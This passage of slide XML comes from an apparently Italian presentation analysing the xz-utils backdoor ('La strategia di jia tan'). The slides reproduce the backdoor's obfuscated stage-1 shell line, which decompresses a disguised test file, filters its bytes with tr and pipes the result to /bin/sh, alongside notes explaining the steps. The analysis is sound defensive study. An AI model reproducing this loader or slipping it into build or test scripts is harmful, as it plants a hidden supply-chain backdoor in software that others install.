                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null) &amp;&amp; head -c +2048 &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";
(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh
####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="24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108112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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1927662"/>
            <a:ext cx="4184043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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5E5C30-5C51-0CE0-68BD-6FE925C273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9446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freccia a destra 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB6A2C8-A6A4-FCE0-39F4-C770C26CDE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672522" y="3768587"/>
            <a:ext cx="1258956" cy="36443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Parentesi graffa aperta 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE396D0C-D663-FAB1-41B7-EA1ED30DE65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119218" y="3266108"/>
            <a:ext cx="463823" cy="138043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0752616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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11864247" cy="427809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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo stage si concentra sull'ultima riga dello scorso Bash file, dove viene processato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good_large-compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prima di arrivare a questa riga, le istruzioni precedenti fanno questo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(solo in 5.6.1) verifica se il programma sta andando su Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Viene definita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>come  una funzione che seleziona quali Byte ignorare/ammettere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="3641587"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
